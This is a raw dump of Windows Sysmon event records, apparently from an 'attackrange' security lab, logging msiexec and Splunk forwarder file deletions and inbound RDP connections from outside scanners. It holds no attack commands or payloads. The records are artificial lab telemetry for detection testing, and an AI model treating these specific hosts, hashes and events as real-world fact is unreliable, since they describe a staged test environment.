AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Windows\assembly\temp\32RCXYVBGB\System.Core.ni.dll.auxMD5=5BC3A9D40323A2B04F4E1902734E283C,SHA256=CFF89802D8AC21E1BCDB723259BCB27CC029712A021861269F65FB5551CBF55E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000072679Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:11.282{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400NT AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Windows\assembly\temp\32RCXYVBGB\System.Core.ni.dllMD5=849D0AA44BCEBD9D08A5FCD6C4880A59,SHA256=B34E567DCB7A031BD7B4F35B6DB317203674C0CF030AA7492E0937D3A31AE861,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000072678Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:11.047{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400NT AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Windows\assembly\temp\2HPT45PVI7\System.Drawing.ni.dll.auxMD5=6C52FA11480271A7CA24597B93F7BB04,SHA256=61F5983290D91AB3DF009F8C874FA8FE2746C9AB30195650831EE3035CB71CCF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000072677Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:11.047{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400NT AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Windows\assembly\temp\2HPT45PVI7\System.Drawing.ni.dllMD5=C0CD3B953E9ADDA2C2CA1B521CAC444A,SHA256=792530B90A2559951E4A2DBECBE5B4B3FDC08CB4140A89FC252E49C9FD342359,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000049975Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:56:11.735{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D7D9B94553B4C43AC8381E3FA97CE4FA,SHA256=D15AB70A7864EFB19033B2DFF7C1641CD691641A8071BFEADDFEE9905F768C41,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000049974Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:56:08.463{85C0FFC9-B7ED-607E-0F00-00000000BB01}948C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-52557-false10.0.1.15win-host-895.attackrange.local3389ms-wbt-server 23542300x800000000000000072712Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:12.797{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400NT AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Windows\assembly\temp\4L80Y8S27S\System.Windows.Forms.ni.dll.auxMD5=AB1FCBE377A6A30943BF24192D913F66,SHA256=1E7B1434F1E86E83CBFD081E03FC9AD1452D6EAEF768D18F35F90360F4AC6CBA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000072711Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:12.750{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400NT AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Windows\assembly\temp\4L80Y8S27S\System.Windows.Forms.ni.dllMD5=DFFF6CA588881F5D87FAE30E754C1D6E,SHA256=B900C0634566D824EB4823FD9AD1CD8C69B65E143978E2F92B6707F9283BBF52,IMPHASH=00000000000000000000000000000000truetrue 354300x800000000000000072710Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:11.241{A7A01FEF-E386-607E-7B0A-00000000BB01}5904C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-339.attackrange.local57517-false10.0.1.12-8000- 354300x800000000000000072709Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:10.798{A7A01FEF-B626-607E-0F00-00000000BB01}1136C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-17851-false10.0.1.14win-dc-339.attackrange.local3389ms-wbt-server 23542300x800000000000000072708Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:12.438{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400NT AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Windows\assembly\temp\4BD2OLDW4N\System.Data.ni.dll.auxMD5=EDB7CB075A217959013CD75CE405CCD2,SHA256=240A71F1AF20552B564ACE0F494BDFFCA2B3982D62D762D1E71E6E1535797972,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000072707Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:12.438{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400NT AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Windows\assembly\temp\4BD2OLDW4N\System.Data.ni.dllMD5=7ABB236413DDD5D4953BB3A2C663E53F,SHA256=D14A3A1F1851D9FD244CBF574F22A3B94B05FBBBC6147381E68F694AD59574E3,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000072706Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:12.344{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\ApplicationMD5=684C59F5E8F60D64CAC3F9CA89415440,SHA256=A28BC70594E7001F8DE746726832CF943AE26AB4E1142FAC53F84BA84B1E729D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000072705Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:12.344{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\ApplicationMD5=BBCA5C7BC67E48C1B2E21276D044551A,SHA256=96F00CCE8DF8F388AC5197C14C0F68E930EA112623E9785475FA16D465D43781,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000072704Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:12.344{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=EDD5932744B5C0199B4DA5921766DEB8,SHA256=753AECDBEB0085EB9C75C0F1AAE168E477616D3AF7DE13A826BCC19B69814F7E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000072703Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:12.203{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400NT AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Windows\assembly\temp\4B8HNLQETZ\System.Drawing.ni.dll.auxMD5=6C52FA11480271A7CA24597B93F7BB04,SHA256=61F5983290D91AB3DF009F8C874FA8FE2746C9AB30195650831EE3035CB71CCF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000072702Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:12.203{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400NT AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Windows\assembly\temp\4B8HNLQETZ\System.Drawing.ni.dllMD5=C0CD3B953E9ADDA2C2CA1B521CAC444A,SHA256=792530B90A2559951E4A2DBECBE5B4B3FDC08CB4140A89FC252E49C9FD342359,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000072701Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:12.157{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400NT AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Windows\assembly\temp\46ZWMVXHQK\System.Web.ni.dll.auxMD5=4B4864D2BDD3887862604DE92C828002,SHA256=58CC8C85446792E57BD9A8C69881CD5E66A5EA5624DCB0B9704E7C356BE58950,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000072700Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:12.157{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400NT AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Windows\assembly\temp\46ZWMVXHQK\System.Web.ni.dllMD5=B38253FDADDC16D1C0B919A2E89DBD1C,SHA256=270074EFA57847FF994319B6D696A0F1D4AD07564FB1A8D2FDC3BBC28C1AFEFD,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000049977Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:56:12.751{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2BDEDF429C3EEC588E155183AFA3B04D,SHA256=ACB6606AB78015C0FCD39446F06C4EF109C5F756BCD3C1C54890A28663C3D1A7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000049976Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:56:12.329{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=C6A39921D16CF265AD31F188C62045B7,SHA256=4B7A1133F848CFE16553431F7AD9066E117152540A2D69E7363ACE9D65465CAA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000072734Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:13.782{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400NT AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Windows\assembly\temp\6Y3OKT3QPY\System.ni.dll.auxMD5=E5FCD42C7D3662F69C906AEC226AF5B8,SHA256=48129DC1F2155ECD4BAEBCFB148120DA8AADD6520BE1BCE9D3B59DCF651906E5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000072733Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:13.782{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400NT AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Windows\assembly\temp\6Y3OKT3QPY\System.ni.dllMD5=F2D17CA8803D8FF69D707964F3EE292F,SHA256=C7D8AFBFB161B83E2211721336DAB1E6C3FD5F5C0E973C8152063FD1AFB89E16,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000072732Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:13.407{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400NT AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Windows\assembly\temp\6POLT6AMCK\System.Xml.ni.dll.auxMD5=C6B8D9FAFDC12F9D667B132D1BD24D04,SHA256=C2FC89CA115F96A788E5EA364A753E2D685A65BFEFE13145B138AE0309D2A99C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000072731Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:13.407{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400NT AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Windows\assembly\temp\6POLT6AMCK\System.Xml.ni.dllMD5=71BC2F8235C4E463DE58A0B06A7CC6E9,SHA256=D311CB68072B7387AF7CBF476708618CFD88A950AA11C17C74D0281AE97DB612,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000072730Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:13.172{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400NT AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Windows\assembly\temp\6PMTPRCX9S\System.ServiceProcess.ni.dll.auxMD5=3BE355F7C741659AC9143FE240563390,SHA256=53584243F91BEFFE8C60395404133B9E0965D4BAA27412A3CB14C43C99ADE994,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000072729Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:13.172{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400NT AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Windows\assembly\temp\6PMTPRCX9S\System.ServiceProcess.ni.dllMD5=E7DDC2DB27A745FD9B904E90978E7F57,SHA256=A598609D6B4C0BE721FD06140AF13828706CC526845C19CCA7B50B3F7C6F8AB6,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000072728Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:13.157{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400NT AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Windows\assembly\temp\6CGGQDM20N\System.Security.ni.dll.auxMD5=8BA8863BEEC87568AAC3B366897D0D32,SHA256=D0E77250356D5D825C484FEE34BBC25BD06C6D1AECC9292A0E3B3DD14FF4B081,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000072727Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:13.157{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400NT AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Windows\assembly\temp\6CGGQDM20N\System.Security.ni.dllMD5=E050C5A89D23FE6EED7B86C3271787F5,SHA256=1045BCADAF25EAA099C264222B8AB242EC71EF1500EE5C524B2F2D6232D4F3C1,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000072726Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:13.125{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400NT AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Windows\assembly\temp\6C9DNXNCG4\System.Configuration.ni.dll.auxMD5=606A2790C740857716526360BA88602A,SHA256=B15A96066C9F545B826B491504F39A1460EFF5392D80DE4B1F5E75BBC86661D6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000072725Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:13.125{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400NT AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Windows\assembly\temp\6C9DNXNCG4\System.Configuration.ni.dllMD5=934AD64C1561413D426D12F22B82DEF8,SHA256=4446DC25DA1EEA3B37DD99082A3D73CBCD8F334C79A60337C79564416E895C26,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000072724Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:13.094{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400NT AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Windows\assembly\temp\634WY9951U\System.Numerics.ni.dll.auxMD5=EB049ABA5517841C734115079F8BD603,SHA256=2877312EFE8951A61700B5A8981F42E506060308E5D402F8E5FC7F879EDAC5FB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000072723Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:13.094{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400NT AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Windows\assembly\temp\634WY9951U\System.Numerics.ni.dllMD5=D282D2158C31BBF5B31EE855F7B15EC7,SHA256=72E1074D33DC23AB1D680257B353F3C2210E1C9095D3284570DC678FA3E93907,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000072722Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:13.094{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400NT AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Windows\assembly\temp\5VCF4Y9RRU\System.Numerics.ni.dll.auxMD5=46C8A979AD3266DDEF725C7E593B0EC9,SHA256=44F41AE20DFD28ABE6EE0E04898C519AD9709FA50D948409B2ECD81BB20D3D37,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000072721Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:13.094{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400NT AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Windows\assembly\temp\5VCF4Y9RRU\System.Numerics.ni.dllMD5=63A9B260BCFCC94E75F0B012DE2B32EF,SHA256=3BFD410197EBDCE1914F9CA077D5B2BE75A664A54D5D9B05169694327EC86CE3,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000072720Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:13.078{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400NT AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Windows\assembly\temp\5BS1TMOGQB\System.Numerics.ni.dll.auxMD5=EB049ABA5517841C734115079F8BD603,SHA256=2877312EFE8951A61700B5A8981F42E506060308E5D402F8E5FC7F879EDAC5FB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000072719Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:13.078{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400NT AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Windows\assembly\temp\5BS1TMOGQB\System.Numerics.ni.dllMD5=D282D2158C31BBF5B31EE855F7B15EC7,SHA256=72E1074D33DC23AB1D680257B353F3C2210E1C9095D3284570DC678FA3E93907,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000072718Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:13.078{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400NT AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Windows\assembly\temp\5AHEMKTSFR\System.Configuration.Install.ni.dll.auxMD5=0CBC2C9737233F80F1C8DD57CE1AE88C,SHA256=6E18B2C2DFA32D6F4925D1BBE903FD9049472C36261FEBA8DD59628E8C6A9F30,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000072717Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:13.078{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400NT AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Windows\assembly\temp\5AHEMKTSFR\System.Configuration.Install.ni.dllMD5=2582241664CA944A32E31176A66CF0C6,SHA256=B7C2F435943924E46E604D1D35C1835920CC706BF320D85179E53CA0F84354FF,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000072716Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:13.032{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400NT AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Windows\assembly\temp\503UQ183RF\System.Transactions.ni.dll.auxMD5=BABAF56BC4E7ED7F5936B9CDA05FB949,SHA256=472049805F257AF427D88C0CC081CA4CF33192FB0418912FDB75CAE1A5D97EF7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000072715Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:13.032{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400NT AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Windows\assembly\temp\503UQ183RF\System.Transactions.ni.dllMD5=0D4D6EFF8A0B941FA83A237F34282E25,SHA256=0B923E73C01D4448E476244603A9B8AF337DCF9342352A2E215EAA6844AA380B,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000072714Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:13.016{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400NT AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Windows\assembly\temp\4XBM0LREMU\System.Core.ni.dll.auxMD5=1D332A2AB96D39725A924B0F7AC5C9E3,SHA256=F7639920830FE768FDE77D0F7AA837CC6A2A620CC2864ABEF06F2D81AE5FF3C0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000072713Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:13.016{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400NT AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Windows\assembly\temp\4XBM0LREMU\System.Core.ni.dllMD5=4F8E92D7B2085AC07167893113B7EE37,SHA256=E5F3FF00F876CB67661B9838A89CBB71C4B5B61AE03D19B6B6020527A58F7691,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000049979Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:56:13.782{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=13D5E0ED17DC9AF8BBDCE08F1B99340B,SHA256=FAC6127D80753A8994BFA8ED036CF75C73A9BD1B1132E3A3782D34E515532111,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000049978Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:56:10.827{85C0FFC9-B7ED-607E-0F00-00000000BB01}948C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse80.82.77.85scanner.openportstats.com61660-false10.0.1.15win-host-895.attackrange.local3389ms-wbt-server 23542300x800000000000000072745Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:14.907{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400NT AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Windows\assembly\temp\8CW0TLLI6C\System.Xml.ni.dll.auxMD5=040DE208CE1EB5D0024CE936E00E3392,SHA256=33953292338BFB6EE2756974051377A824A6C6DA3BA533A3FBA6D86218957BEF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000072744Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:14.907{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400NT AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Windows\assembly\temp\8CW0TLLI6C\System.Xml.ni.dllMD5=6644706835E5D443B9822C53AED1B87C,SHA256=14CFCA3962038FEEFF28F93571BDA791D9DAF2FB8E34C066E027DBEF1D07F5F7,IMPHASH=00000000000000000000000000000000truetrue 354300x800000000000000072743Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:13.107{A7A01FEF-B626-607E-0F00-00000000BB01}1136C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse80.82.77.85scanner.openportstats.com62471-false10.0.1.14win-dc-339.attackrange.local3389ms-wbt-server 23542300x800000000000000072742Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:14.688{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400NT AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Windows\assembly\temp\7K6F2KWFLK\System.Core.ni.dll.auxMD5=34557D491F925C33B9579E2AE5BD4017,SHA256=AD30F4DA8CFDDF64D38E65145696AF7233CD5ABA10C244B882ABAFB770D7E608,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000072741Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:14.688{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400NT AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Windows\assembly\temp\7K6F2KWFLK\System.Core.ni.dllMD5=19160F5E64B830DD9B54C49057A68163,SHA256=F18AEDE0C9B8E6ADA6BF9FCBD86239712F1C420E1BAEF0FF02339F2F15F8BB81,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000072740Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:14.485{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400NT AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Windows\assembly\temp\7GTLY186Q3\PresentationFramework.ni.dll.auxMD5=47D8164F6B5704DE03EE18C8BD6B1507,SHA256=0AA5F90BD35E835B70F375A5E5A4D7BB5E8FCD38BA34BA17F1F4B24598044389,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000072739Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:14.485{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400NT AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Windows\assembly\temp\7GTLY186Q3\PresentationFramework.ni.dllMD5=6FF3D4E13A7F80E99CF8C87B2E2EA61E,SHA256=4B5DEC8E153D241755C9B804B32DC41D865A93F1D12A59533E07574524A528B6,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000072738Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:14.375{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\ApplicationMD5=684C59F5E8F60D64CAC3F9CA89415440,SHA256=A28BC70594E7001F8DE746726832CF943AE26AB4E1142FAC53F84BA84B1E729D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000072737Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:14.375{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=ED392CD93AA07B081D0F8A50D857037E,SHA256=5512F73C52E129CDA82EE001C8DBE0C17739F7404DEB0F574B1D445B0299AF06,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000072736Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:14.063{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400NT AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Windows\assembly\temp\7D1S6WJRIJ\System.Web.ni.dll.auxMD5=0F3C7B662FBC079F29C3EF02690771DF,SHA256=FA432BD61A221C689873F7123B62039D1CA3CA2DA09E90F87CA1C939F3FAE4A4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000072735Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:14.063{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400NT AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Windows\assembly\temp\7D1S6WJRIJ\System.Web.ni.dllMD5=8E96EC1FB2ED02BAACD1964616C6C37B,SHA256=9EEE12F5A918A691006264A2479B713E832CC7DD8F292F6F65D8BFEC3C6F0130,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000049982Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:56:14.814{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3A735EE42F64D855894E499A1AE55022,SHA256=A4FFD81EA804074195404EDBB3A98C4FD94B734198859510842EB1BF8E476F38,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000049981Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:56:14.470{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 